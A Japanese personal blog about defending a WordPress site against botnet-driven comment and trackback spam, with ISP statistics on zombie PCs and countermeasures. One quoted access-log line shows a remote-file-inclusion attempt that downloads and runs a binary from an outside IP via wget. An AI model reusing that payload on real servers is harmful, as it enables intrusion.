しばらく見ないうちにまたComment Spamが貯まっていた。

BotNetを使っているのでほぼ送信ホストは無限にある感じ。
もういちいちブロックリストに登録するのも面倒になってきた。

ふと思ってWordpress+spamとかで検索してみたら、皆さんお困りのようですね。沢山ヒットしました。

いろいろWordpress用のPluginもあるもののどれも作られた時代が古くフィルターが甘い感じ。うまく動くかどうかもわからないので、一番簡単な対策を施すことに。

それはコメント承認のデフォルトを"削除"にして、必要なものだけのこしてあとは一括でﾎﾟｲｯ(ﾉ´ｰ`)ﾉ ⌒ (:D) ｺﾞﾛﾝｯ

過去Comment Spam投稿に使われたZombi IPアドレスを調べたら、中にはYahhBBとかTepco光とかの加入者もかなりの数含まれていることが判明。常時接続時代の落とし穴だね。

先日BotNetを利用して大量のMail Spamを送信していた犯人が韓国で捕まったらしいけど、氷山の一角だろうね。同じようにComment SpamをBotNetを利用して送信している輩はまだ野放し。こちらも早く捕まって欲しい。しかしZombi PCが無くならないとこれもイタチごっこ。

slashdot.jpの記事にDVDレコーダーやこりゃ英和に内蔵されているanonymous proxy機能が悪用されてコメントスパムとかの踏み台になっている実態が報告されていた。

常時接続環境でのこうした危険性は当初から危ぶまれていたが、まさかヒット商品を生み出している企業が諸悪の根元だったとは。

どうりでYahooBBとかUSENとかの加入者からコメントスパムが飛んでくるわけだ。特にYahooBBはやたら多い。

この調子だといずれ世界から日本国内の動的IPアドレスからのアクセスは閉め出されてもおかしくないね。

そういう重大なビジネス上のリスクをYahooBBは理解しているのだろうか。YahooBlogとか平気でプログラム検閲してご満悦しているようでは倫理感の欠如としかいいようがない。こないだ中国とか北米とかで検閲問題が話題沸騰したというのに。

といっても当サイトはYahooBBで接続しているのでどうしたものか。心配になってSlashdot.jpの記事に載っていた不正中継サイトのIPアドレスリストに自分のIPアドレスが載っているかどうか検索してみた。

結果はanon proxyサイトリストにはどれも載っていなかった。確信はしていたがほっとした。けれどもダイナミックIPアドレスのリストには載っていた。これもいずれ状況が悪化すればインターネットからダイナミックIPアドレス利用者は閉め出されるという兆候なのかもしれない。

インターネットの初期の頃はダイナミックIPアドレスとかいう考えはなかったからね。インターネットを普及させる苦肉の策がダイナミックIPアドレスだったし、それは接続相手を特定できないというリスクを含んでいた。それが今になってしょうもない国産DVDレコーダーや翻訳ソフトによって深刻な問題になってきている。社会的な影響をまったく配慮していないとしか言えない。どこもかしこも「やばくなったり儲からなくなったら撤退すればいい」という割り切りだからだろうか。これ自体スパム業者と考えは一緒だ。

まさか孫氏も同じ考えでいるのだろうか。

これまでtrackback spam攻撃を受けたIPアドレスをすべてブロックするようにして、更にtrackbackのURLを標準とは異なるものに変更することで被害は0になった。

現在もまだ新たな攻撃先が増加しているので検知しだいブロックリストに追加するようになっているが日々微増して１０００件超えている。

その中で依然としてdomain名が逆引きできないアドレスが大半を占めている。

NXDOMAIN数/全ブロックIP件数=813/1345 (約60%)
SERVFAIL数:25

残りが逆引きできるアドレスで507件。

以前にも書いた通り、世界にZombie PCは存在するが同一の接続業者で多数のZombie PCを擁するのはYahooBBが世界でNo1だということが証明された。国内と思われるドメインのみリストアップすると以下の通り。

件数 プロバイダのドメイン
85 bbtech.net (YahooBB)
20 ftth.ucom.ne.jp (USEN)
7 rev.home.ne.jp
3 zaq.ne.jp
2 catv.ppp.infoweb.ne.jp
2 nice-tv.jp
1 bc9.ne.jp
1 tctv.ne.jp
1 lan-do.ne.jp
1 c3-net.ne.jp
1 thn.ne.jp
1 aitai.ne.jp
1 catvmics.ne.jp
1 neptun.ium.ne.jp

YahooBBがトップなのはADSL接続がルーターではなくモデムに接続したPCがDHCPでアドレスを取得するという方式なため、PC側のすべてのポートが武装解除した状態でオープンになることがZombie PCが多い理由だと容易に想像がつく。業者にとってはレンタル機材のコストが低減できるので良いかもしれないが、そのリスクは利用者がかぶることになる。

当サイトもYahooBBのADSLだが自前のルーターを介しているので通常のPCは攻撃を受けることはない。httpとSMTPのポートを玄箱サーバーに割り当てているので、そちらが目下のところ要監視。

YahooBBを利用する場合にはぜひともADSLモデムとPCの間に自前でルーターを設置することをおすすめする。最近は値段も安くなったので。

結局wp-trackback.phpやwp-comments-post.phpの標準的なパスで決め打ちで攻撃してくるので、それらをrenameして消した。

するとFile Not foundエラーが延々返されるわけだが、こうしたほうがサーバーの負荷は軽い。ブロックリストも無くしてしまった。

それでも未だに事態に気づいていないのかおかまいなしなのか延々とtrackback攻撃は終日休み無く続いている。

それと平行して新たなZombie PCをこしらえるためのBot進入攻撃も後をたたない。

201.17.175.51 - - [14/Jun/2006:22:08:35 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&G
LOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP
/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

もう日がたっているので上記の http://72.18.195.161/lnikon というファイルは削除されたのか存在しない。サーバーとしては生きているがどうせこれもZombie PCだし。

はやく諦めてどっかに行ってくれないかな。

毎回File not foundのページを送り返すのももったいないので、wp-trackback.phpとwp-comments-post.phpをそれぞれダミーの何もしないphpスクリプトにしておいた。

これなら5バイトしか返さないしエラーも返らないのできっと気づかないに違いない。

全部ブロックを外したのはいいが、またしても負荷が急増した。

犯人はHatena Page Title Agent(IPアドレス 221.186.146.26)
こいつだけは許せない。

TrackbackやComment SPAM対策としてURIを非標準なものに変更して効果絶大だったが、今朝のログを見るといきなり見慣れるアドレスから新しいURIでComment SPAMを試みた記録が残っていた。

幸いにしてこちらのミスで当該URIは存在しないことになっていたので、一回のトライで終わっている。

攻撃者はクライアントにJakarta HttpClientを使っているようだった。これを使っている人は大変珍しい。なにせJavaで書かれていてApacheプロジェクトからダウンロードできるが、専門家でない限り使わない。通常のアクセスログでもRSSを定期的にダウンロードしているのに使っているユーザーが一人いるだけである。それ以外のアクセスでは見たことが無かった。

Javaで書かれているので書き直せば攻撃用プログラムにも早変わりする。

trackbackのURIを標準のものから変更したのが先月末からばれて正しいURIで連日絶え間なくtrackback spamが貯まっていた。

あながち馬鹿ではないようだ。trackback spamしてくるIPアドレスはそれ専用にして、どっか他のIPからコメント投稿ページを開いてURIを確認したのだろう。

そしたらまた変えるだけなんだけどね。

あきらめの悪い

195.225.176.87

からの無駄な抵抗的trackbackが休み無く続きている。まだURIがfakeなのに気づいていないようだ。

この分だとアクセス統計上これがダントツ一位になりそうだ。

今朝方から変更したcomment投稿URIを使ったスパムが始まった。

ばれたらまた変えればよいと変更したが、驚いたことに次ぎの瞬間から変更したURIに追従してスパムが投稿されている。

むむ、敵も進化してページを読み返して現在のcomment投稿URIを取得するように自動化してきたらしい。

ということはやはり究極の方法としては画像でランダムな識別コードを表示してそれを投稿の際に入力してもらう方法を取るしかないと思われる。